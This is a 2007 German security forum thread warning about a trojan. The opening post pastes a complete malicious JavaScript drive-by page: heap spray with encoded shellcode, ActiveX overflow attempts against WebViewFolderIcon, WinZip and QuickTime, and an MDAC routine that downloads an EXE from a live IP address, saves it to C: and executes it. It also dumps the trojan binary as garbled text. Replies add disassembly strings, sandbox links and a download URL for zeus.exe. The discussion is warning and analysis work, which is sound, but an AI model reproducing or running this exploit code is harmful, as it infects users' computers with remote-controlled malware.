Trojaner Warnung und Javascript Downloader

raid-rush · 2. Juni 2007

Gelegentlich stoße ich auf neue Trojaner,

der Trojaner selbst wird mittels javascript downloaded und ausgeführt, ist halt ne alte sicherheitsglücke die aber immernoch mit jedem browser funzt... ohne kaspersky ist man da aufgeschmissen

folgender code lies sich entnehmen:

Code:

 
<html><head><script language="JavaScript">

var mm = new Array();
var mem_flag = 0;

function h() {mm=mm; setTimeout("h()", 2000);}

function getb(b, bSize)
{while (b.length*2<bSize){b += b;}
b = b.substring(0,bSize/2);return b;}

function cf()
{var zc = 0x0c0c0c0c;
var a = unescape("䍃䍃࿫㍛曉肹老" +
"￬譿擯齤䋳齤滧" +
"擯뤃憇܃ꩦ맫瞇攑ߡꩦ맧" +
"쪇ၟܭꩦ맣‡༡ޏꩦ맿⺇ખ" +
"ݗꩦ꿻흯騬昕뇯驦擋" +
"撶޹螿鿀砇曯⩤⽬暿쾪" +
"ႇ뿯ꩤ藻뛭멤߷ꫬ⣏돯솑⢊" +
"誗騐擏撶꼇藯럨ꫬ밴Ⴜ" +
"쾚벿ꩤ藳뛪멤߷騐擏撶" +
"＇藯搐ﾪ撶껯붴໬໬໬໬" +
"ͬ뗫撼വ봘༐撺搃뉤맣鱤擓뤜" +
"饤꘦䊮ⳬｑᷕ℮꼝Ḅᇔ" +
"骱딊Ѥ땤褲撤㋬넪ⶲᬇ" +
"ထ먐ꎽꂢ瑨灴⼺㠯⸱㔹ㄮ㤴㈮⼸潬潧是汩⹥桰p");
 var heapBlockSize = 0x400000;
 var pls = a.length * 2;
 var bSize = heapBlockSize - (pls+0x38);
 var b = unescape("ఌఌ"); b = getb(b,bSize);
 heapBlocks = (zc - 0x400000)/heapBlockSize;
 
 for (i=0;i<heapBlocks;i++)
 {mm[i] = b + a;}

 mem_flag = 1;
 having();
 return mm;
}

function startWVF()
{
 for (i=0;i<128;i++)
 {
 try{ var tar = new ActiveXObject('WebVi'+'ewFol'+'de'+'rIc'+'on.WebVi'+'ewFol'+'derI'+'con.1');
 d = 0x7ffffffe;
 b = 0x0c0c0c0c
 tar.setSlice(d, b, b, b ); 
 }catch(e){}
 }
}

function startWinZip(object)
{
 var xh = 'A'; while (xh.length < 231) xh+='A'; xh+="\x0c\x0c\x0c\x0c\x0c\x0c\x0c"; object.CreateNewFolderFromName(xh);
}

function startOverflow(num)
{
 if (num == 0) {
 try {
 var qt = new ActiveXObject('Quick'+'Time.Qu'+'ickTime'); 
 if (qt) {
 var qthtml = '<object CLASSID="clsid:02BF25D5-8C17-4B23-BC80-D3488ABDDC6B" width="1" height="1" style="border:0px">'+
 '<param name="src" value="qt.php">'+
 '<param name="autoplay" value="true">'+
 '<param name="loop" value="false">'+
 '<param name="controller" value="true">'+
 '</object>';
 if (! mem_flag) cf();
 document.getElementById('myd'+'iv').innerHTML = qthtml;
 num = 255;
 }
 } catch(e) { }

 if (num = 255) setTimeout("startOverflow(1)", 2000);
 else startOverflow(1);

 } else if (num == 1) {
 try {
 var winzip = document.createElement("object");
 winzip.setAttribute("classid", "clsid:A09AE6"+"8F-B14D-43"+"ED-B713-BA413"+"F034904");

 var ret=winzip.CreateNewFolderFromName(unescape("%00"));
 if (ret == false) {
 if (! mem_flag) cf();
 startWinZip(winzip);
 num = 255;
 }

 } catch(e) { }

 if (num = 255) setTimeout("startOverflow(2)", 2000);
 else startOverflow(2);

 } else if (num == 2) {

 try {
 var tar = new ActiveXObject('WebVi'+'ewFol'+'derIc'+'on.WebVi'+'ewFol'+'derI'+'con.1');
 if (tar) {
 if (! mem_flag) cf();
 startWVF();
 }
 } catch(e) { }
 }
}


function GetRandString(len)
{
 var chars = "abcdefghiklmnopqrstuvwxyz";
 var string_length = len;
 var randomstring = '';
 for (var i=0; i<string_length; i++) {
 var rnum = Math.floor(Math.random() * chars.length);
 randomstring += chars.substring(rnum,rnum+1);
 }

 return randomstring;
}

function CreateObject(CLSID, name) {
 var r = null;
 try { eval('r = CLSID.CreateObject(name)') }catch(e){} 
 if (! r) { try { eval('r = CLSID.CreateObject(name, "")') }catch(e){} }
 if (! r) { try { eval('r = CLSID.CreateObject(name, "", "")') }catch(e){} }
 if (! r) { try { eval('r = CLSID.GetObject("", name)') }catch(e){} }
 if (! r) { try { eval('r = CLSID.GetObject(name, "")') }catch(e){} }
 if (! r) { try { eval('r = CLSID.GetObject(name)') }catch(e){} }
 return(r);
}

function XMLHttpDownload(xml, url) {

 try {
 xml.open("GET", url, false);
 xml.send(null);

 } catch(e) { return 0; }

 return xml.responseBody;
}

function ADOBDStreamSave(o, name, data) {

 try {
 o.Type = 1;
 o.Mode = 3;
 o.Open();
 o.Write(data);
 o.SaveToFile(name, 2);
 o.Close();
 } catch(e) { return 0; }

 return 1;
}

function ShellExecute(exec, name, type) {

 if (type == 0) {
 try { exec.Run(name, 0); return 1; } catch(e) { }
 } else {
 try { exe.ShellExecute(name); return 1; } catch(e) { }
 }

 return(0);

}

function MDAC() {
 var t = new Array('{BD96C5'+'56-65A3-11'+'D0-983A-00C04FC'+'29E30}', '{BD96C'+'556-65A3-11'+'D0-983A-00C0'+'4FC29E36}', '{AB9B'+'CEDD-EC7E-47'+'E1-9322-D4A21'+'0617116}', '{0006F'+'033-0000-0000-C000-000000'+'000046}', '{0006'+'F03A-0000-0000-C000-0000000'+'00046}', '{6e32'+'070a-766d-4ee6-879c-dc1fa'+'91d2fc3}', '{6414'+'512B-B978-451D-A0D8-FCFDF3'+'3E833C}', '{7F5B'+'7F63-F06F-4331-8A26-339E03'+'C0AE3D}', '{0672'+'3E09-F4C2-43'+'c8-8358-09FCD1D'+'B0766}', '{639F'+'725F-1B2D-48'+'31-A9FD-87484'+'7682010}', '{BA018'+'599-1DB3-44f'+'9-83B4-46145'+'4C84BF8}', '{D0C07'+'D56-7C69-43F1-B4'+'A0-25F5A1'+'1FAB19}', '{E8C'+'CCDDF-CA28-496b-B'+'050-6C07C962'+'476B}', null);
 var v = new Array(null, null, null);
 var i = 0;
 var n = 0;
 var ret = 0;
 var urlRealExe = 'http://81.95.149.28/logo/file.php';

 while (t[i] && (! v[0] || ! v[1] || ! v[2]) ) {
 var a = null;

 try {
 a = document.createElement("object");
 a.setAttribute("classid", "clsid:" + t[i].substring(1, t[i].length - 1));
 } catch(e) { a = null; }
 
 if (a) {
 if (! v[0]) {
 v[0] = CreateObject(a, "msxml2.XMLHTTP");
 if (! v[0]) v[0] = CreateObject(a, "Microso"+"ft.XM"+"LHT"+"TP");
 if (! v[0]) v[0] = CreateObject(a, "MSX"+"ML2.Se"+"rverXM"+"LHT"+"TP");
 }

 if (! v[1]) {
 v[1] = CreateObject(a, "ADODB.Str"+"eam");
 }

 if (! v[2]) {
 v[2] = CreateObject(a, "WSc"+"ript.Sh"+"ell");
 if (! v[2]) {
 v[2] = CreateObject(a, "Shel"+"l.Ap"+"pl"+"icati"+"on");
 if (v[2]) n=1;
 }
 }
 }

 i++;
 }

 if (v[0] && v[1] && v[2]) {
 var data = XMLHttpDownload(v[0], urlRealExe);
 if (data != 0) {
 var name = "c:\\sys"+GetRandString(4)+".exe";
 if (ADOBDStreamSave(v[1], name, data) == 1) {
 if (ShellExecute(v[2], name, n) == 1) {
 ret=1;
 }
 }
 }
 }

 return ret;
}

function start() {

 if (! MDAC() ) { startOverflow(0); }

}

</script>
</head>
<body onload="start()">
<div id="mydiv"></div>
</body>
</html>

Der Trojaner selbst ist eine 6.6kb große datei, vermutlich fügt er euren rechner in ein kleines botnetz hinzu genaueres hab ich nochnicht analysiert...

hier die exe im textformat:

Code:

MZ ÿÿ ¸ @ ¸ º ´ Í!¸LÍ!This program cannot be run in DOS mode.

$ ¢çúúæ†”©æ†”©æ†”©h™‡©ö†”©‹é©ç†”©
Ê©ç†”©Richæ†”© PE L J–`F à è ö 0 ‡c , ( ˆ , .text ð
 `.rdata ( @ @.data ~ã 0 @ À.rsrc ˆ @ @ U‹ì3É‹U3Àë?ÓÉ3ÁŠ
ƒÂ
ÉuóÉÂ U‹ìƒÄìSVW‹]ƒeì ÿs<Xf<PE…¡ ‹LxÉ„• ƒ} „‹ Ë‹QÿqX‹q ÿq$_ÃREøûPEðWEôóREüÿu_3Àÿ6Y3ÒëQPYÓÈY3ÐŠƒÁ
Àuî‹M‹E;TütƒÁÿuõƒÆÿMüuÌë+ÿuøXÿuôZ+Eü‹BÿuðXâÿÿ ‹IÿuXÓÿEìRˆëË‹Eì;Et+À_^[ÉÂ +Òdÿ2XJ;tÿ0Xë÷hè MZPEÿpXYf+À‹ Ãf;t ÿÿëôÁùÿp<Zf;t+ÀÃU‹ìPSQR‹E3É‹]Š0@Š2òˆ3C@A;MrïZY[XÉÂ U‹ìÿuÿuèl ‹E@3Éf‹@@ÿuQPèµÿÿÿÉÂ U‹ìh hˆ2ÿuèÄÿÿÿÉÂ h? j j ÿ¸@Àt[Pˆ6h 0èÃÿÿÿhÿ hˆ2ÿ5ˆ6ÿ¼@Àt$£Œ6h6jÿ5Œ6ÿ°@ÿ5Œ6ÿ´@ÿ5ˆ6ÿ¬@ÃU‹ìh+0h¬6ÿD@h¦0h¬6ÿ@@ÿuh¬6ÿ@@h;h j h¬6h €ÿ @À…Â h =j=h_0èÿÿÿh=h¬6h=j hˆ2ÿ5;ÿ¤@Àuh¬6h~0èì ƒø vkh =h…0è·þÿÿh=h¬6h=j hˆ2ÿ5;ÿ¤@Àu0h¬6h¨0è ƒø v¬6HjdPh¬:ÿT@j =ÿ5;ÿø?ÉÂ U‹ìƒÄøj  =h;h j h+0h €ÿ @ÀuLj Eüh =j j j j h=h;ÿuüÿ5;ÿœ@PEøÀu
ÿEüh;èeþÿÿƒ}ø t¹ÿ5;ÿø?ÉÃ¡05¼ Pè[ À„Ë è[ÿÿÿƒ= =…¹ h0h¬6ÿD@h#0h¬6ÿ@@h¬:h¬6ÿ@@Ç$=D hh=h$=j j j j j j h¬6j ÿ @jÿ0@ÿ50XƒðzPèÌ Àuäh0è—ûÿÿPè¸ Pj jÿL@j PÿP@jÿ0@h0èkûÿÿPèŒ ÀuÀÃU‹ìÿuÿX@PŒ=£=ƒø tVÿuÿX@P”=ÿ”=ƒø t;ÿ5”=ÿuh˜=ÿT@h˜=ÿuÿ\@ƒø tƒ== tÿ
=ÿEëÅ3Àë¡Œ=+=@ÉÂ U‹ìj jÿl@ƒøÿtk£>Ç¡>( h¡>ÿ5>ÿp@ƒøuFhÅ>è˜úÿÿ;Euÿ5>ÿø?¡©>ë$h¡>ÿ5>ÿt@ÀuÉÿ5>ÿø?j XÉÂ U‹ìWVhx=j(ÿuÿ”@h€=ÿuj ÿ@j|=‹E£ˆ=j j j h|=j ÿ5x=ÿŒ@^_ÉÂ hª0[ÿ3YƒÃQSQèÿÿÿÀtPj jÿL@jPÿP@[YÉuÔÃU‹ìWQPü‹}ÿuYÁé3Àó«ÿuYƒáóªXY_ÉÂ U‹ìVWQPü‹u‹}‹Mó¤XY_^ÉÂ j-ÿ0@ÿ5Õ?YQÙ?Ãÿ5 2è–þÿÿƒø †Ö PÑ?h_1hÝ?ÿD@hÊ0èÊúÿÿhÉ?hˆ2h €ÿ˜@h¸ hc1jj h_1ÿ5É?ÿ¨@Àu}jÍ?jhÍ?jj hÝ?ÿ5É?ÿ¨@ÿ5É?ÿø?ÿ5Ñ?j j‹
L@‰
Õ?j Ù?hÉ?j j hoj j ÿ€@jxÿ0@ÿÙ?jPÿP@ÃI U‹ìSQR3É‹EE3ÒŠUŠ8ÀÂ2úÀÏ2ùˆ8@ASh [K…Ûuû[;MrÞZY[ÉÂ U‹ìƒÄühú ÿ0@h j@ÿd@‰Eüh ÿuüh}2è{ùÿÿÿuüj j ÿuüÿ„@j j ÿuüÿuj ÿÄ@Çø@ fÇü@
 hAhÌ@j j j j j j ÿuüj ÿ @ÿ
vj è† ÉÂ j vh12ÿ$@ÿ@hhh ÿ@h@2ÿ$@ÿ@ƒÀ£`
j h€ jj jh €ÿ5`
ÿü?PDj h\
hPÃ hJÿ5DÿH@ÿ5Dÿø?¡<24Ì¿Jh' Yò¯ŠG‹ƒÇWj PQWèsþÿÿ_‰=È@ÿ5`
ÿ@À„bÿÿÿÿ5È@hd
ÿD@ÿ5È@[Sdj Xhd
ÿX@@Pj@ÿd@Pzhd
ÿ5zÿD@hrj ÿ5zh°j j ÿ€@ÿvj Xÿ5d[CŠ< uùCŠ< t‰dÿ5dhd
ÿD@éyÿÿÿj2ÿ0@ƒ=v uïj ÿ@Ãèñ j(èö hƒ X1ô?Ãj(èâ h$2X¹… 1ÃèâöÿÿÀ…Õ ÃtÑ‡Í–ÀeAü &Înçú¦³Nç²X±Ó‚].g©ýó#\ÿ‹6W‘s8ðó$é:ðþ}…@rçùÍ·Î¼#æ³[9=k2¸µ+;eÖ…¹
³×š‘¬OÑÒ*niØül`ÊûAQOZ&® \~Æ/ädn?¢9ñØýÆÄsâx7ÿ],€ÐÁý
Þñb$ W¡½s%bÀ¶#æñPSü^ Á>Ãp%5(¥Bv‡¨bè¤<bšQ¤¶ìY
E*’ŠŸ
 æÒ+ÿ £ô?5ô?ƒ èÒ j XjXhrj j hÜj j è£ ¸ è« hÈ XPè« hø?ÿ5¨hÿ5ô?èÑôÿÿ;¨tÃ¸$2h… Y1hrj j hõj j ÿ€@hú ÿ0@h$2ÿ$@Àt(Pˆ@hŒ@ÿ5àh¬Pèlôÿÿ;àtÃëÃh@2ÿ$@Àt&£À@hÄ@ÿ5èhäPè6ôÿÿ;ètÃëÃÃhj2è…õÿÿj j jj j h €hˆ2è¡ ƒøÿ„x PèŒ jh 0 h Zbj è© …À„W h € h ZbPè— è²ýÿÿè)úÿÿè<õÿÿèU÷ÿÿh hDj ÿ@ÇÌ@D Çø@ fÇü@ hK2èåôÿÿhˆ2hFÿ@@hDhFÿ@@hAhÌ@j j jj j j hFj ÿ @j ÿ@PDÿ5DXP_<ƒÇƒÇ‹G8P Aj@h 0 ÿ5 Aÿ5Dÿ5Aÿ4@£$Ah(Aÿ5 Aÿ5Dÿ5$Aÿ5Aÿ<@h 0Ah0Aÿ5Aÿ @ÇèAJh0Aÿ5Aÿ,@ÿ5Aÿ(@hô ÿ0@j ÿ@j è ÿ% ÿ% ÿ% ÿ% ÿ% ÿ% ÿ% ÿ% ÿ% ÿ%$ € Ž œ ¬ º È Ø è ð ! T ! € Ž œ ¬ º È Ø è ð ! CloseHandle 0 CreateFileA F CreateThread € ExitProcess  ExitThread RGetTickCount RtlZeroMemory `Sleep VirtualAlloc ƒVirtualFree kernel32.dll user32.dll Ú—¡Âi:mâ‹†ã“ÿfíË:_msiexec.exe /qn /x SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall 
 [ºè™ÕBN>‚æ¡Àÿ‹íˆC
¢Ì;]#Lefspersk ˜Í©Ç0Ys]. t\=F*®Â5fzI;è}†á\ { ¬Ñ»=H ìeÿËZ6Š;KòÑ¥jáÌEÊ*yˆ I €Óc,Jh<AWo=]@ eè›rºÎ®ò‘ßãŒ*N*v†ÅL9L>B0$Aphá·ceÖ¥4]gm÷«¥èF)Ã§:OâŽx2A›Ç×–(eÇˆW®òCÌ©éÕ¡ŠãÏ¡
j÷„Z›Ø¿Ð nM+<U;\,BrÿÏþ¢¸ëR7oÃ·ÛµX?†õexc 2 \ D e v i c e \ H a r d d i s k V o l u m e 1 \ 2 \ D e v i c e \ H a r d d i s k V o l u m e 2 \ 2 \ D e v i c e \ H a r d d i s k V o l u m e 3 \ ÿÿÿÿ_num Hg˜—advapi32.dll user32.dll S´Æ§urlmon.dll 7DO9žý¢Ê]2{ŸëhFò—î–¥ÀdD 0SÕï‹×àŽ•ášön
j Ü¿ëÑ¨ô € 0 € H ` " 1 Ÿ´Æ§Ûf X¡ÐŠÍé(M„„^Ï¬Ø¸=Ä~jÈl\*à[k\¬ÛäÈè:º[®çí¼î{:žvv*-ÎÞ^+“æ©xë¯ÊŒeÅ‰/|X¨ùáŠ:Y|9ðÑJ\•dþÚÉ)ÎÇý9

Anzeige

tHe dUdE · 2. Juni 2007

AW: Trojaner Warnung und Javascript Downloader

Seltsame Datei... Kein Call zu winsock32 etc.

Address Disassembly Text string
15161210 PUSH file.1516302B ASCII "SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall"
151612AA PUSH file.1516307E (Initial CPU selection)
1516134E PUSH file.1516302B ASCII "SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall"
151613E6 PUSH file.15163017 ASCII "msiexec.exe"
151613F6 PUSH file.15163023 ASCII " /qn /x"
1516145F PUSH file.15163017 ASCII "msiexec.exe"
1516148B PUSH file.15163017 ASCII "msiexec.exe"
151616A1 PUSH file.1516315F ASCII "exc"
151616DE PUSH file.1516315F ASCII "exc"
15161852 PUSH file.15163231 ASCII "user32.dll"
15161873 PUSH file.15163240 ASCII "urlmon.dll"
151619FC PUSH file.15163224 ASCII "advapi32.dll"
15161B57 MOV EAX,file.15163224 ASCII "advapi32.dll"
15161B87 PUSH file.15163224 ASCII "advapi32.dll"
15161BBF PUSH file.15163240 ASCII "urlmon.dll"

Address Disassembly Destination
151612AA PUSH file.1516307E (Initial CPU selection)
15161C23 CALL <JMP.&kernel32.CloseHandle> kernel32.CloseHandle
15161C14 CALL <JMP.&kernel32.CreateFileA> kernel32.CreateFileA
15161B18 CALL <JMP.&kernel32.CreateThread> kernel32.CreateThread
15161DAF CALL <JMP.&kernel32.ExitProcess> kernel32.ExitProcess
15161841 CALL <JMP.&kernel32.ExitThread> kernel32.ExitThread
151619DC CALL <JMP.&kernel32.GetTickCount> kernel32.GetTickCount
15161AFB CALL <JMP.&kernel32.GetTickCount> kernel32.GetTickCount
15161B22 CALL <JMP.&kernel32.GetTickCount> kernel32.GetTickCount
15161167 CALL <JMP.&kernel32.RtlZeroMemory> ntdll.RtlZeroMemory
151619E3 CALL <JMP.&kernel32.Sleep> kernel32.Sleep
151619F7 CALL <JMP.&kernel32.Sleep> kernel32.Sleep
15161B2E CALL <JMP.&kernel32.Sleep> kernel32.Sleep
15161C36 CALL <JMP.&kernel32.VirtualAlloc> kernel32.VirtualAlloc
15161C4E CALL <JMP.&kernel32.VirtualFree> kernel32.VirtualFree

eugen · 2. Juni 2007

AW: Trojaner Warnung und Javascript Downloader

seit wann kennt Firefox ActiveXObject ?

Der js code wird sogar von nem alten Antivir erkannt.

Und die dll ist auch nichtmehr aufm Server.

Btw. wer Javascript auf jeder Seite an hat ist selber schuld - für sowas gibts ne whitelist.

tHe dUdE · 2. Juni 2007

AW: Trojaner Warnung und Javascript Downloader

Es ist keine DLL, es ist wie gesagt eine EXE.

http://81.95.149.28/logo/file.php (NICHT KLICKEN)

eugen · 2. Juni 2007

AW: Trojaner Warnung und Javascript Downloader

ok die wollte es bei mir nichteinmal laden ^^ (ie + winxp + steuerelement zugelassen)

D4m14n · 2. Juni 2007

AW: Trojaner Warnung und Javascript Downloader

The analysis of your file is finished.
You can find your report at http://analysis.seclab.tuwien.ac.at/result.php?taskid=efceae56b7984e54a54dd440aa998a79

eugen · 2. Juni 2007

AW: Trojaner Warnung und Javascript Downloader

Nett was da so nachgeladen wird
http:// 81.95.149.28/ logo/ zeus.exe

http://analysis.seclab.tuwien.ac.at/result.php?taskid=52e6d0a44ae5a044199b2e3b8ad62b3d#id1913234

raid-rush · 4. Juni 2007

AW: Trojaner Warnung und Javascript Downloader

joa hab mich mal darum gekümmert...

paar wochen oder monate später wirds sicher auch von anderen av-herstellern gefunden,
sofern es jemand einsendet weil ich glaub nicht das die unternander so stark koperiern?

Jackson_5* · 4. Juni 2007

AW: Trojaner Warnung und Javascript Downloader

^^ lol nice work raid vll bekommste ja ne belohnung ^^

und glaub schon das die firmen nen direkten draht zu einander haben^^ und vll haste ja ne virus/trojaner welle verindert die menschheit dankt dem annonymen Viren warner (u)

Nützliche Suchen

Trojaner Warnung und Javascript Downloader

Videos zum Themenbereich